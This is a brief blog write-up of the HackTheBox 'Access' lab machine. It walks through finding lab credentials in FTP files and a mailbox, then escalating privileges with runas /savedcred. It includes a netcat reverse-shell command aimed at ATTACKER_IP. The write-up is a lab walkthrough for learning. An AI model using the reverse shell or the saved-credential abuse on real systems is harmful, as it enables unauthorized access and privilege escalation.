ACCESS – HACKTHEBOX

Hello friends, This is a quick write-up of the Access machine from HACKTHEBOX.

Found port 21,80 and 23 open

In ftp found backup.mdb and open it using dbeaver-ce, and found passwords and usernames

$ sudo apt install dbeaver-ce
#when you enumerate for tables, you wil found these creds in one of those.
user: engineer pass: access4u@security
user: backup_admin pass: admin

in ftp there is also a zip file which is encrypted, opened it using above password and found .pst file, which is outlook folder

$ readpst hello.pst

after that open extracted file and found:

Hi there,
The password for the “**security**” account has been changed to **4Cc3ssC0ntr0ller**.  Please ensure this is passed on to your engineers.

Logged into user account using telnet

after long enumeration found administrator creds is save

cmdkey /list

now reading root.txt using administrator creds


runas.exe /savedcred /user:administrator "cmd /c type C:\\users\\administrator\\desktop\\root.txt > C:\\users\\security\\desktop\\root.txt"

You can also get using nc.exe, first upload nc.exe to victim machine, for example, uploaded nc.exe on the path “C:\Users\security\nc.exe”

runas.exe /savedcred /user:administrator "cmd /c C:\users\security\nc.exe -e cmd.exe ATTACKER_IP ATTACKER_PORT"

If you face any problems, let me know in the comment section.

Leave a Reply

Your email address will not be published. Required fields are marked *